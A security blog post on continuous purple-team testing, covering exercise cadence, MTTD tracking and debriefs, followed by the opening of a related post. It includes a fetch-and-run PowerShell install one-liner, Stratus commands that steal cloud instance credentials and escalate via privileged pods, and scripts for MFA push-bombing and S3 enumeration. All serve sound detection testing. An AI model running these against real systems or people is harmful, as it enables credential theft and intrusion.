Purple Team Archives

Continuous Purple Team Testing: Attack Simulations for Your Own Infrastructure

July 10, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes


TL;DR

Continuous purple team testing is the practice of running structured attack simulations against your own infrastructure on a quarterly cadence: not an annual audit, but an operational discipline
Detection time drops exercise-over-exercise when the same technique is simulated repeatedly: the same cross-account AssumeRole technique that took 4 hours to detect in Q4 took 8 minutes by Q2 the following year
The toolchain is open source: Atomic Red Team (ATT&CK-mapped) for host-level techniques, Stratus Red Team for cloud-native attack simulations, and custom scripts for what neither covers
The debrief template — not the tool — is what turns a simulation into a detection improvement; document what fired, what didn’t, and why before closing the exercise
Mean time to detect (MTTD) per technique is the only metric that tells you whether the program is working
Frequency of simulation is the independent variable; better tooling and more headcount are not — how often you practice determines how fast you detect

OWASP Mapping: Cross-cutting — this episode validates defenses against every OWASP Top 10 category covered in this series. EP04 (A01 Broken Access Control), EP05 (A07 Auth Failures), EP06 (A08 Software Integrity), EP07 (A10 SSRF), EP08 (A05 Misconfiguration), EP09 (A06 Vulnerable Components), EP10 (A01 lateral movement), EP11 (A09 Monitoring Failures). Continuous purple team testing is how you verify your fixes for all of them actually hold under simulation.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              QUARTERLY PURPLE TEAM CYCLE                            │
│                                                                     │
│    ┌─────────┐    ┌──────────┐    ┌──────────┐    ┌─────────────┐  │
│    │  PLAN   │───▶│ SIMULATE │───▶│  DETECT  │───▶│   DEBRIEF   │  │
│    │         │    │          │    │  (or miss)│    │             │  │
│    │ • Scope │    │ Red runs │    │           │    │ What fired? │  │
│    │ • Safety│    │ technique│    │ Blue logs │    │ What didn't?│  │
│    │ • Week 1│    │ • Week 2 │    │ results   │    │ • Week 3    │  │
│    └─────────┘    └──────────┘    └──────────┘    └──────┬──────┘  │
│                                                           │         │
│         ┌─────────────────────────────────────────────────┘         │
│         │                                                           │
│         ▼                                                           │
│    ┌─────────┐    ┌──────────┐                                      │
│    │   FIX   │───▶│  REPEAT  │◀──── same technique, updated rules  │
│    │         │    │          │                                      │
│    │ • Rules │    │ Does it  │                                      │
│    │ • Config│    │ catch it │                                      │
│    │ • Week 4│    │ now?     │                                      │
│    └─────────┘    └──────────┘                                      │
│                                                                     │
│    OUTCOME: MTTD drops exercise-over-exercise                       │
│    When MTTD < 10 min: retire technique, rotate in the next one     │
└─────────────────────────────────────────────────────────────────────┘

Continuous purple team testing is not a tool you buy or a team you staff. It is a cadence: the same attack path, run repeatedly against your own environment, until detection time drops to a point where the attacker has no useful dwell time.

From EP01 to EP13: The Arc

In EP01, I described a red team engagement where the blue team took 11 days to detect a compromise. The red team used real techniques. The blue team had all the relevant logs. The detection logic just wasn’t tuned to the specific patterns in this specific environment.

Keep that environment, that attacker playbook, and that blue team in mind, because they are the same ones in what follows.

Six months later, same scope. Same techniques. The blue team detected in 22 minutes.

Not because they hired anyone new. Not because they switched SIEMs. Not because they bought a new detection product. Because in the intervening six months, they ran four purple team exercises, using the techniques from the first engagement as the test backlog.

Exercise 1: 11 days → 4 hours. Detection rule didn’t exist. Wrote it on the spot during debrief.

Exercise 2: 4 hours → 47 minutes. Rule existed but had a misconfigured threshold that generated false negatives. Fixed during debrief.

Exercise 3: 47 minutes → 38 minutes. Marginal improvement — the technique was becoming well-detected. Rotated in a new technique.

Exercise 4 (new technique): baseline 4+ hours. Same cycle begins.

The number 22 minutes, which is where the original technique sits now, is not a product of better tooling. It is the product of running the simulation repeatedly and fixing the gap found each time.

That is the arc of this series. EP01 defined the practice. EP02 through EP12 gave you the attack backlog. EP13 gives you the program to run them.

Building the Exercise Program

Cadence: The Three Loops

Most organizations treat purple team as an event. An annual penetration test reframed as “collaborative.” One event per year produces one point of data. One point of data is not a trend.

The program that actually moves MTTD operates in three nested loops:

Quarterly exercises — full simulations with red executing and blue observing. Four per year minimum. Each exercise covers one attack path end-to-end, with timestamps, debrief, and detection rule updates. This is the primary loop.

Monthly tabletop drills — no infrastructure required. Two hours. Pull one technique from the backlog, walk through it verbally: “Where would this show up in our logs? What would the CloudTrail event look like? Do we have a rule? What’s the threshold?” No simulation, just shared mental model. Catches drift in detection logic before the quarterly exercise finds it the hard way.

Weekly detection rule reviews — 15-minute async. Run the detection queries that should fire for your most recent exercises. Do they still return results? Rules that worked in October can silently stop working in January when a Terraform apply changes a logging configuration or a GuardDuty region setting drifts. Drift happens without review.

The quarterly exercise is the load-bearing loop. Monthly tabletops and weekly reviews keep it from regressing between exercises.
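
The weekly review lends itself to a small script. The sketch below assumes the detection queries have already been run and their hit counts exported as tab-separated `rule name<TAB>hit count` lines; that export format and the function name `find_silent_rules` are illustrative assumptions, not part of any SIEM. It prints the rules that returned nothing, which are the candidates for silent drift.

```bash
#!/usr/bin/env bash
# find_silent_rules: read "rule<TAB>hits" lines on stdin and print the names
# of rules whose hit count is zero. The input format is an assumption made
# for this sketch; adapt the export step to your own SIEM.
find_silent_rules() {
  awk -F'\t' 'NF >= 2 && $2 + 0 == 0 { print $1 }'
}
```

Fed the weekly export, for example `find_silent_rules < weekly-rule-hits.tsv` (a hypothetical file name), any rule it prints either needs a fresh simulation to confirm it still fires or has lost its log source.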

The Four-Week Exercise Structure

Each quarterly exercise follows the same four-week structure. Deviating from it is how exercises turn into ad hoc sessions with no durable output.

Week 1: Scope Agreement
──────────────────────
□ Which attack path from this series are we testing?
□ Which systems are in scope (account IDs, namespaces, node names)?
□ Circuit breaker: who can call off the exercise and how?
  (One named person. A Slack DM or phone call — not a ticket.)
□ Safety controls: are test accounts isolated from prod data paths?
□ Notification: who needs to know this is happening?
  (Cloud provider account team if large-scale, internal leadership)
□ Pre-exercise baseline: run detection queries now and record results


Week 2: Red Executes, Blue Observes
────────────────────────────────────
□ Red team runs the technique — with the actual tool and actual commands
□ Blue team is watching the SIEM / CloudTrail / Falco / GuardDuty
  in real time during execution
□ Both sides timestamp everything:
  [HH:MM] Technique started
  [HH:MM] First observable artifact (log entry, network event)
  [HH:MM] Alert fired (or: no alert)
  [HH:MM] Blue team acknowledged
□ Do NOT wait until the end to compare notes — call out gaps in real time


Week 3: Debrief and Rule Update
────────────────────────────────
□ Walk through the timeline together — not red presenting to blue
□ For each gap: what data existed? why didn't the rule fire?
  (Data existed + rule wrong: fix the rule)
  (Data existed + rule missing: write the rule)
  (Data didn't exist: fix the logging configuration)
□ Write or update detection rules during the debrief — not as a follow-up ticket
□ Update the runbook: what does the analyst do when this alert fires?
□ Commit all rule changes to version control before the debrief ends


Week 4: Re-Run and Verify
──────────────────────────
□ Red runs the same technique again — no changes to the attack
□ Does the updated detection catch it?
□ Record new MTTD
□ If yes: mark technique as covered, add to retirement queue when MTTD < 10 min
□ If no: iterate — another week of rule work, another re-run
□ Set date and technique for next quarter's exercise

The re-run in Week 4 is not optional. A detection rule written during a debrief and never verified against the actual technique may be logically correct and syntactically wrong, or may fire on a slightly different variant. You don’t know until you run the attack again.
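
Recording the new MTTD is simple arithmetic on two of the Week 2 timestamps: technique started and alert fired. A minimal sketch, assuming both are written as full UTC ISO 8601 timestamps rather than bare HH:MM, and assuming GNU `date` is available; the function name `mttd_minutes` is made up for illustration.

```bash
#!/usr/bin/env bash
# mttd_minutes: whole minutes between "technique started" and "alert fired".
# Both arguments are UTC ISO 8601 timestamps, e.g. 2026-04-05T14:00:00Z.
# Relies on GNU date's -d option to parse them.
mttd_minutes() {
  local start_epoch alert_epoch
  start_epoch=$(date -u -d "$1" +%s) || return 1
  alert_epoch=$(date -u -d "$2" +%s) || return 1
  echo $(( (alert_epoch - start_epoch) / 60 ))
}
```

Calling `mttd_minutes 2026-04-05T14:00:00Z 2026-04-05T14:08:00Z` prints `8`. Using full timestamps instead of HH:MM keeps the arithmetic correct when an exercise crosses midnight UTC.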

The 10-Attack Rotation from This Series

The techniques in this table are the exercise backlog built across EP04–EP12. Run them in order — or reorder based on your current threat model. The MTTD column is blank until you run the exercise and fill it in.

Quarter	Attack Path	Source Episode	MTTD (Baseline)	MTTD (After Exercise)
Q1 2026	SSRF to EC2 IMDS (IMDSv2 enforcement check)	EP07	—	—
Q2 2026	MFA fatigue simulation against test account	EP05	—	—
Q3 2026	Container escape via `--privileged` pod	EP08	—	—
Q4 2026	Cross-account `sts:AssumeRole` lateral movement	EP10	—	—
Q1 2027	CI/CD secrets exposure via environment variable leak	EP06	—	—
Q2 2027	S3 public access misconfiguration (broken access control)	EP04	—	—
Q3 2027	Supply chain: unsigned artifact injection into pipeline	EP09	—	—
Q4 2027	eBPF-visible process anomaly (persistence via cron)	EP11	—	—
Q1 2028	CloudTrail disable + GuardDuty suppression	EP12	—	—
Q2 2028	Full path: SSRF → IMDS → AssumeRole → S3 exfil	EP07 + EP10	—	—

Fill in the MTTD columns as you run. That table, populated over two years, is your program’s evidence of improvement. It is also what you show an auditor, a CISO, or a board when asked “how do you know your security controls work?”

The Toolchain

Atomic Red Team (ATT&CK-Mapped Host Techniques)

Atomic Red Team is Red Canary’s library of ATT&CK-mapped attack simulations. Each atomic test maps to a specific MITRE technique, lists the required permissions, and is defined as a self-contained set of commands. The library contains hundreds of atomic tests across Linux, macOS, and Windows; the exact count changes with every release, so list the tests after installing to see what is current.

# Install the Invoke-AtomicRedTeam execution framework
pwsh -Command "Install-Module -Name invoke-atomicredteam -Scope CurrentUser -Force"

# Install the Atomics folder (the actual test library)
pwsh -Command "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicsfolder.ps1' -UseBasicParsing); Install-AtomicsFolder"

# List brief details for all techniques (filtered to the current OS by default;
# add -anyOS to include tests for other platforms)
pwsh -Command "Invoke-AtomicTest All -ShowDetailsBrief"

# Inspect a specific technique before running (T1078: Valid Accounts)
pwsh -Command "Invoke-AtomicTest T1078 -ShowDetails"

# Check prerequisites for test #1 of T1078 (this does not execute the test)
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1 -CheckPrereqs"

# Execute the test
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1"

# Clean up after the test
pwsh -Command "Invoke-AtomicTest T1078 -TestNumbers 1 -Cleanup"

For the exercises in this series, the most relevant atomic techniques are:

MITRE Technique	ID	Covers
Valid Accounts	T1078	EP05 (credential reuse)
Cloud Instance Metadata API	T1552.005	EP07 (IMDS access)
Container Administration Command	T1609	EP08 (exec into container)
Steal Application Access Token	T1528	EP06 (CI/CD token theft)
Account Discovery	T1087.004	EP04, EP10 (IAM enumeration)

Stratus Red Team (Cloud-Native Attack Simulations)

Stratus Red Team is Datadog’s cloud-specific attack simulation framework. Unlike Atomic Red Team (which focuses on host techniques), Stratus covers AWS, GCP, Azure, and Kubernetes attack paths using the actual cloud APIs, the same calls an attacker would make.

# Install (requires Go 1.21+)
go install github.com/DataDog/stratus-red-team/v2/cmd/stratus@latest

# Verify
stratus version

# List all available techniques
stratus list

# List AWS-specific techniques only
stratus list --platform aws

# List Kubernetes techniques
stratus list --platform kubernetes

# Get details on a specific technique before running
stratus show aws.credential-access.ec2-steal-instance-credentials

The workflow for each Stratus technique is: warm up (provision prerequisites) → detonate (execute the attack) → cleanup (remove artifacts). Never skip cleanup.

# EP07 exercise: IMDS credential theft simulation (the stage that follows the SSRF)
# Technique IDs change between releases; confirm this one with `stratus list`
# Warm up (provisions a test EC2 instance with an instance role)
stratus warmup aws.credential-access.ec2-steal-instance-credentials

# Detonate: retrieves the instance role credentials and uses them from outside the instance
stratus detonate aws.credential-access.ec2-steal-instance-credentials

# At this point: check CloudTrail for API calls made with the instance role
# credentials from an unexpected source IP
# Check GuardDuty for InstanceCredentialExfiltration findings
# Record whether your detection fired and when

# Cleanup (terminates the test instance)
stratus cleanup aws.credential-access.ec2-steal-instance-credentials

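# EP10 exercise: lateral movement
# Note: ec2-instance-connect simulates pushing SSH keys to instances through
# EC2 Instance Connect, not cross-account role assumption. Use it as the
# built-in lateral movement drill and a custom script for the AssumeRole path.
stratus warmup aws.lateral-movement.ec2-instance-connect
stratus detonate aws.lateral-movement.ec2-instance-connect

# Detection check: look for SendSSHPublicKey events from unexpected principals
# (lookup-events has no top-level source IP field; it is inside CloudTrailEvent)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=SendSSHPublicKey \
  --start-time "$(date -d '1 hour ago' -u +%Y-%m-%dT%H:%M:%SZ)" \
  --query 'Events[].{Time:EventTime,User:Username,Key:AccessKeyId}' \
  --output table

stratus cleanup aws.lateral-movement.ec2-instance-connect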

# EP08 exercise: Kubernetes container escape simulation
stratus warmup k8s.privilege-escalation.privileged-pod
stratus detonate k8s.privilege-escalation.privileged-pod

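# Detection check: Falco's "Launch Privileged Container" rule (or your own equivalent) should fire
# Kubernetes events are not audit logs, so query the API for privileged pods directly
kubectl get pods -A -o json | \
  jq -r '.items[] | select(any(.spec.containers[]; .securityContext.privileged == true)) | "\(.metadata.namespace)/\(.metadata.name)"'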

stratus cleanup k8s.privilege-escalation.privileged-pod

The full Stratus technique list as of this writing covers 50+ AWS techniques and 10+ Kubernetes techniques. Run stratus list after installing to see what’s current — the library is actively maintained and new techniques are added when new attack patterns emerge in the wild.

Building Custom Simulation Scripts

Atomic Red Team and Stratus don’t cover everything. MFA fatigue in particular requires tooling specific to your identity provider. Build simple, focused scripts for the gaps.

#!/bin/bash
# simulate-mfa-fatigue.sh
# Simulates an MFA fatigue attack by triggering repeated push notifications
# to a test account. Run ONLY against a designated test user — never a real
# employee account. The test account should have MFA enabled but no access
# to any production systems.
#
# Usage: ./simulate-mfa-fatigue.sh <test-user-email> <idp-test-api-endpoint>
# Example: ./simulate-mfa-fatigue.sh test-user@example.com https://idp.internal/test/push

TEST_USER="${1:-}"
IDP_ENDPOINT="${2:-}"
PUSH_COUNT=10
PUSH_INTERVAL=30  # seconds between pushes

if [ -z "$TEST_USER" ] || [ -z "$IDP_ENDPOINT" ]; then
  echo "ERROR: test user email and IdP test API endpoint are both required"
  exit 1
fi

echo "MFA fatigue simulation"
echo "Target user: $TEST_USER"
echo "Push count: $PUSH_COUNT"
echo "Interval: ${PUSH_INTERVAL}s"
echo ""
echo "Blue team: watch for repeated MFA push events in your IdP logs"
echo "Detection signal: >3 push requests to the same user within 5 minutes"
echo ""

START_TIME=$(date -u +%Y-%m-%dT%H:%M:%SZ)
echo "[$(date -u +%H:%M:%S)] Simulation started — timestamp this for your debrief"

for i in $(seq 1 $PUSH_COUNT); do
  echo "[$(date -u +%H:%M:%S)] Sending push request $i of $PUSH_COUNT..."

  # Trigger push via your IdP's test/simulation API
  # Okta example: POST /api/v1/authn/factors/{factorId}/verify
  # Replace with your IdP's actual test endpoint
  HTTP_STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
    -X POST "$IDP_ENDPOINT" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"$TEST_USER\", \"factor\": \"push\", \"simulation\": true}")

  echo "    Response: HTTP $HTTP_STATUS"

  if [ "$i" -lt "$PUSH_COUNT" ]; then
    sleep "$PUSH_INTERVAL"
  fi
done

END_TIME=$(date -u +%Y-%m-%dT%H:%M:%SZ)
echo ""
echo "[$(date -u +%H:%M:%S)] Simulation complete"
echo "Start: $START_TIME"
echo "End:   $END_TIME"
echo ""
echo "Blue team: check IdP logs for push events in this window"
echo "Expected detection: alert on >3 MFA pushes to single user in 5 min"
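
The detection signal the script prints (more than 3 pushes to one user within 5 minutes) can be prototyped offline before it becomes a SIEM rule. The sketch below assumes the IdP push events have been reduced to `epoch_seconds user` lines in time order; that input format and the function name `detect_mfa_fatigue` are assumptions for illustration, not any IdP's log schema.

```bash
#!/usr/bin/env bash
# detect_mfa_fatigue [window_seconds] [threshold]
# stdin: "<epoch_seconds> <user>" lines, sorted by time (assumed format).
# Prints one ALERT line per user the first time that user receives more than
# <threshold> pushes inside a sliding window of <window_seconds>.
detect_mfa_fatigue() {
  local window="${1:-300}" threshold="${2:-3}"
  awk -v w="$window" -v t="$threshold" '
    {
      ts = $1; user = $2
      n[user]++
      times[user, n[user]] = ts
      if (!(user in start)) start[user] = 1
      # Drop events that have fallen out of the window.
      while (ts - times[user, start[user]] > w) start[user]++
      count = n[user] - start[user] + 1
      if (count > t && !(user in alerted)) {
        print "ALERT " user " " count " pushes within " w "s at " ts
        alerted[user] = 1
      }
    }'
}
```

With the simulation's default of one push every 30 seconds, the fourth push crosses the threshold, so a working rule should alert roughly 90 seconds after the simulation starts. That gives the debrief a concrete expected alert time to compare against.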

#!/bin/bash
# simulate-s3-enum.sh
# Simulates the access pattern of an attacker enumerating S3 buckets
# after obtaining IAM credentials. Run in a test AWS account only.
# Purpose: verify CloudTrail ListBuckets and GetBucketAcl events fire
# and that your detection rule catches credential-based enumeration.

echo "[$(date -u +%H:%M:%S)] S3 enumeration simulation starting"
echo "Blue team: watch CloudTrail for ListBuckets from unexpected IAM principal"

# Enumerate buckets
echo "[$(date -u +%H:%M:%S)] ListBuckets..."
aws s3api list-buckets --query 'Buckets[].Name' --output text

# Attempt to read bucket ACLs (generates GetBucketAcl events)
echo "[$(date -u +%H:%M:%S)] Checking ACLs..."
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read -r bucket; do
    aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[].Grantee | select(.URI != null) | .URI' | \
      grep -q "AllUsers" && echo "PUBLIC ACL: $bucket"
  done

echo "[$(date -u +%H:%M:%S)] Enumeration complete — check CloudTrail now"

The pattern for custom scripts: timestamp every action, print what the blue team should be watching for, clean up after execution. A simulation script that leaves test resources running is how exercises create incidents instead of preventing them.
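
That pattern can be factored into a few helpers shared by every custom script. This is a minimal sketch; the helper names (`log_step`, `watch_for`, `run_with_cleanup`) are hypothetical, and the simulation and cleanup steps are passed in as function names.

```bash
#!/usr/bin/env bash
# log_step: print a UTC-timestamped line so red and blue timelines line up.
log_step() {
  printf '[%s] %s\n' "$(date -u +%H:%M:%S)" "$*"
}

# watch_for: tell the blue team which signal the next step should produce.
watch_for() {
  log_step "Blue team: watch for $*"
}

# run_with_cleanup <simulate_fn> <cleanup_fn>
# Runs the simulation, then always runs the cleanup, even if the simulation
# failed, and returns the simulation's exit status.
run_with_cleanup() {
  local simulate="$1" cleanup="$2" status=0
  log_step "Simulation started"
  "$simulate" || status=$?
  log_step "Cleaning up"
  "$cleanup"
  log_step "Simulation complete (exit status $status)"
  return "$status"
}
```

A script then defines its own `simulate` and `cleanup` functions and ends with `run_with_cleanup simulate cleanup`, so the cleanup step cannot be forgotten when the attack step errors out.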

Measuring Progress

The metric that matters is MTTD per technique, tracked over time. Everything else — alert count, tool coverage, headcount — is a proxy.

MTTD tracking table: Cross-Account AssumeRole (EP10)
─────────────────────────────────────────────────────
Exercise   Date      Technique              MTTD      Notes
─────────────────────────────────────────────────────
Q4 2025    Oct 12    Cross-acct AssumeRole  4 hours   No detection rule existed
Q1 2026    Jan 18    Cross-acct AssumeRole  45 min    Rule written, threshold wrong
Q2 2026    Apr 5     Cross-acct AssumeRole  8 min     Threshold fixed, alert configured
─────────────────────────────────────────────────────
Status: MTTD < 10 min achieved — technique retired from rotation
Next: Rotate in CI/CD secrets exposure (EP06)

When MTTD falls below 10 minutes for a technique, retire it from the quarterly rotation. Add it to a “verified coverage” list. Run it annually to confirm the detection hasn’t regressed. Rotate a new technique from the backlog into the quarterly slot.

Ten minutes is the threshold because below that, an attacker executing this technique in your environment has less dwell time than it takes them to pivot to the next stage. It’s not a hard security boundary — it is a practical operational signal that the technique is well-detected enough to stop driving your exercise cadence.
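
The retirement rule is simple enough to encode, which keeps the decision consistent from quarter to quarter. A sketch under stated assumptions: the function name `rotation_status` is invented here, MTTD is passed in whole minutes, and the literal `none` stands for an exercise where nothing was detected.

```bash
#!/usr/bin/env bash
# rotation_status <mttd_minutes|none> [threshold_minutes]
# Applies the retirement rule: a technique leaves the quarterly rotation
# only when its latest MTTD is below the threshold (10 minutes by default).
rotation_status() {
  local mttd="$1" threshold="${2:-10}"
  if [ "$mttd" = "none" ]; then
    echo "keep: not detected"
  elif [ "$mttd" -lt "$threshold" ]; then
    echo "retire: MTTD ${mttd} min is under ${threshold} min"
  else
    echo "keep: MTTD ${mttd} min is at or above ${threshold} min"
  fi
}
```

Applied to the tracking table above, 240 and 45 minutes both return `keep`, and 8 minutes returns `retire`.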

Track coverage at the series level:

# Create a coverage tracking file
cat > ~/purple-team-coverage.txt << 'EOF'
Technique                      Episode  Status          MTTD
──────────────────────────────────────────────────────────────
S3 public access (broken ACL)  EP04     Not started     —
MFA fatigue                    EP05     Not started     —
CI/CD secrets (env var leak)   EP06     Not started     —
SSRF to IMDS                   EP07     Not started     —
Container escape (privileged)  EP08     Not started     —
Supply chain (unsigned build)  EP09     Not started     —
Cross-account AssumeRole       EP10     Not started     —
Process anomaly (eBPF-visible) EP11     Not started     —
CloudTrail disable             EP12     Not started     —
Full chain (EP07 + EP10)       EP07+10  Not started     —
EOF

Update the status column after each exercise. “Not started” → “In rotation” → “MTTD: X min” → “Retired (< 10 min)”. That file, kept in version control, is the program’s durable record.
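
A quick summary of that file shows how much of the backlog has been exercised. The sketch below assumes the column layout used in the file above, with the Status and MTTD columns separated by two or more spaces; the function name `coverage_summary` is hypothetical.

```bash
#!/usr/bin/env bash
# coverage_summary <coverage-file>
# Counts rows per status. Columns are split on runs of two or more spaces,
# and the status is read as the second-to-last column, so technique names
# containing single spaces do not break the parse.
coverage_summary() {
  awk -F'  +' '
    NR > 1 && NF >= 3 { count[$(NF - 1)]++ }
    END { for (s in count) print s ": " count[s] }
  ' "$1" | sort
}
```

Running `coverage_summary ~/purple-team-coverage.txt` on the freshly created file reports every technique as `Not started`; the shift of rows into the later statuses over time is the trend worth showing.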

The Debrief Template

The debrief is where the detection improvement happens. Without structure, debriefs turn into post-mortems that produce action items nobody closes. Use this template — fill it out during the debrief, not after.

# Purple Team Exercise Debrief

Exercise:      [name, e.g. "SSRF to IMDS — Q1 2026"]
Date:          [YYYY-MM-DD]
Attack path:   [from which EP, e.g. "EP07: SSRF to Cloud Metadata"]
Participants:  [red team members] / [blue team members]

## Timeline

| Time (UTC) | Event |
|------------|-------|
| HH:MM      | Attack started |
| HH:MM      | First observable artifact (specify: log entry / network event / process spawn) |
| HH:MM      | Alert fired in [tool] — or: no alert |
| HH:MM      | Blue team acknowledged |
| HH:MM      | Exercise concluded |

MTTD this exercise: [X hours / Y minutes / not detected]

## What Fired

- [Tool]: [Alert name / rule name] — fired at [HH:MM], [latency] after attack started
- [Tool]: [Alert name] — fired at [HH:MM]

## What Should Have Fired and Didn't

- [Expected detection] — root cause: [rule missing / rule wrong / data missing / log not ingested]
- [Expected detection] — root cause: [...]

## Root Cause of Gaps

1. [Gap 1]: [Why the detection didn't exist or didn't work — be specific]
2. [Gap 2]: [...]

## Actions

- [ ] Write detection rule for [gap] — owner: [name] — due: [date]
- [ ] Update runbook [X] to include response steps for [alert] — owner: [name]
- [ ] Fix configuration: [Y] — owner: [name] — due: [date]
- [ ] Commit all rule changes to [repo/path] — owner: [name] — due: today

## Re-Run Result (Week 4)

Date:          [YYYY-MM-DD]
MTTD:          [X minutes]
Detection:     [fired / did not fire]
Notes:         [what changed, what's still open]

## Next Exercise

Date:          [target quarter start]
Technique:     [from backlog]
Source:        [EP number]

The most important line in this template is “due: today” for committing rule changes to version control. Detection improvements that live only in the SIEM’s web UI get overwritten by the next infrastructure apply or the next policy sync. They disappear without a trace, and the next exercise finds the same gap again.
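
The root-cause options in the template map directly onto the three fixes from the Week 3 checklist. As a small worked example, the hypothetical helper below takes two yes/no answers from the debrief and names the fix; the function name and the yes/no convention are assumptions for illustration.

```bash
#!/usr/bin/env bash
# classify_gap <data_existed: yes|no> <rule_existed: yes|no>
# Mirrors the Week 3 decision: missing data is a logging problem, existing
# data with a rule that did not fire is a rule bug, and existing data with
# no rule at all means the rule has to be written.
classify_gap() {
  local data_existed="$1" rule_existed="$2"
  if [ "$data_existed" != "yes" ]; then
    echo "fix the logging configuration"
  elif [ "$rule_existed" = "yes" ]; then
    echo "fix the rule"
  else
    echo "write the rule"
  fi
}
```

Answering the data question first matters: writing or tuning a rule is wasted effort if the log source it depends on was never ingested.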

Series Closer: What This Series Taught

Looking back across all 13 episodes:

EP01 — Purple team is a practice, not a team. Red executes, blue observes, both debrief together.
EP02 — OWASP Top 10 applies to infrastructure. Every category has a cloud-native equivalent.
EP03 — The 2020–2025 breach landscape is three themes: identity, supply chain, misconfiguration.
EP04 — Broken access control is the most common failure. IAM wildcards and public S3 buckets are the infrastructure form.
EP05 — MFA fatigue exploits push-based MFA UX. The fix is hardware keys — not training.
EP06 — Secrets in CI/CD pipelines are structural, not behavioral. Pre-commit hooks and SAST scanning are the fix.
EP07 — IMDSv1 has no authentication. Any SSRF anywhere is a straight line to IAM credentials.
EP08 — --privileged erases the boundary between container and host. Two commands from compromised pod to root on the node.
EP09 — Supply chain attacks target the trust chain, not the code. XZ Utils was two years of social engineering.
EP10 — Cloud lateral movement is IAM trust misconfiguration, not network pivoting. One overly broad sts:AssumeRole trust policy is enough.
EP11 — eBPF sees what CloudTrail doesn’t — kernel-level process and network events in real time, before the attacker’s process exits.
EP12 — Incident response quality is inversely proportional to how much you practiced it. The organizations that contain in 4 hours practiced containing in 4 hours.
EP13 — Frequency of simulation is the variable that changes detection time.

Every attack in this series exploited something that existed before the attacker arrived. The attacker didn’t create the IAM wildcard, the ungated CI/CD pipeline, the privileged pod, or the IMDSv1 endpoint. They found what was already there.

Purple team is how you find it first.

That’s the entire premise. Thirteen episodes to demonstrate it across ten attack paths. The practice is now yours to run.

What’s Next — Cross-Series

The Purple Team Playbook ends here, but the technical depth that makes it work lives in three other series running in parallel on linuxcent.com:

Kernel-level detection — the eBPF: From Kernel to Cloud series covers everything from kernel hooks and BPF maps to Cilium and runtime security with Tetragon. EP11 in this series referenced eBPF detection; the eBPF series is where the implementation depth lives.

Hardened base images — closing the OS-level attack surface that EP08 and EP09 in this series exploited starts at image build time. The hardened image pipeline gate post covers building signed, minimal base images that eliminate entire attack surface categories before the container ever starts.

The identity layer — every attack in this series ultimately had an IAM component: the overly permissive role, the wildcard policy, the cross-account trust boundary that was too broad. What Is Cloud IAM starts the 12-episode Cloud IAM series that maps the identity architecture underpinning all of it.

These series are designed to be read in parallel — techniques that appear as one-line references in this series get full treatment in the others. The eBPF series covers TC hooks and bpftrace in the depth that EP11 introduced. The IAM series covers sts:AssumeRole trust policies in the depth that EP10 referenced.


⚠ Production Gotchas

Test account isolation is not optional. Every simulation in this series should run in a dedicated AWS account (or GCP project / Azure subscription) with no trust relationships to production accounts. One stratus detonate command that runs in a prod account and modifies IAM trust policies is an incident, not an exercise. The cost of a test account is zero compared to the cost of a real incident.

Stratus leaves state. If you interrupt a stratus detonate run, the warmup infrastructure is still running and costing you money. Always run stratus cleanup even after an interrupted exercise. Add it to a trap in your exercise runbook.
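
One way to wire that trap is sketched below. It uses only the `stratus warmup`, `stratus detonate`, and `stratus cleanup` subcommands shown earlier; the wrapper name `run_exercise` is hypothetical, and the technique ID is whatever you pass in.

```bash
#!/usr/bin/env bash
# run_exercise <technique-id>
# Runs warmup and detonate in a subshell whose EXIT trap always calls
# cleanup, so Ctrl-C or a failed detonation still tears down the warmup
# infrastructure. Returns the status of the warmup/detonate sequence.
run_exercise() {
  local technique="$1"
  (
    trap 'stratus cleanup "$technique"' EXIT
    trap 'exit 130' INT TERM
    stratus warmup "$technique" &&
      stratus detonate "$technique"
  )
}
```

Invoke it as `run_exercise <technique-id>` with an ID taken from `stratus list`. The subshell keeps the trap scoped to a single exercise, so it does not leak into the rest of the runbook script.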

Detection rules written during debriefs may contain errors your SIEM does not flag. Rule logic written in a 30-minute debrief window gets only a quick review. Run each new rule against 30 days of historical logs before relying on it. A rule that has never matched known-bad historical data may have a quiet logic error.

Alerting ≠ detection. A rule that fires but routes to a queue no one monitors is not a detection. The debrief template asks “alert fired in [tool]” — confirm the alert also appeared in a queue that an on-call engineer would have seen. Route validation is part of the exercise.

Scope creep kills exercises. The first quarter an exercise runs long, someone proposes “let’s just add two more techniques since we have time.” Don’t. Four well-documented techniques with full debrief and verified re-runs beat ten half-documented techniques with action items that never close. Keep the scope tight. Add techniques by rotating them into the next quarter’s slot.

Quick Reference

Component	What It Is	When to Use
Atomic Red Team	ATT&CK-mapped host technique library	Host-level techniques: process execution, credential access, persistence
Stratus Red Team	Cloud-native attack simulations	AWS/GCP/Azure/K8s API-based attack paths
Custom scripts	Org-specific simulations	MFA fatigue, IdP-specific attacks, internal tool abuse
MTTD	Mean time to detect — measured per technique	Primary metric; track over time per technique
Circuit breaker	Named person who can halt an exercise	Safety control; must be identified in Week 1
Debrief template	Structured post-exercise documentation	Filled during debrief, committed to version control same day
Retirement threshold	MTTD < 10 minutes	When to rotate a technique out of quarterly rotation
Coverage list	Techniques with verified detections	Auditable record of what your program has validated

Key Takeaways

Continuous purple team testing means running the same attack paths quarterly, not annually, until MTTD per technique drops below 10 minutes
The four-week exercise structure (scope → simulate → debrief → re-run) is the unit of work; deviating from it is how exercises produce action items instead of detection improvements
Atomic Red Team covers ATT&CK-mapped host techniques; Stratus Red Team covers cloud-native attack simulations; custom scripts cover what neither does
The debrief template — filled in during the session, committed to version control before the session ends — is what separates exercises that improve detection from exercises that produce unread reports
MTTD < 10 minutes for a technique means retire it and rotate in the next one from the backlog this series gave you
The frequency of simulation is the variable that changes detection time. Not the tools. Not the headcount. How often you practice.

Cloud Incident Response Playbook: First 24 Hours After a Breach

July 8, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes


TL;DR

A cloud incident response playbook is not documentation you write after a breach — it is the executable sequence your team runs in the first 24 hours, rehearsed before the breach happens
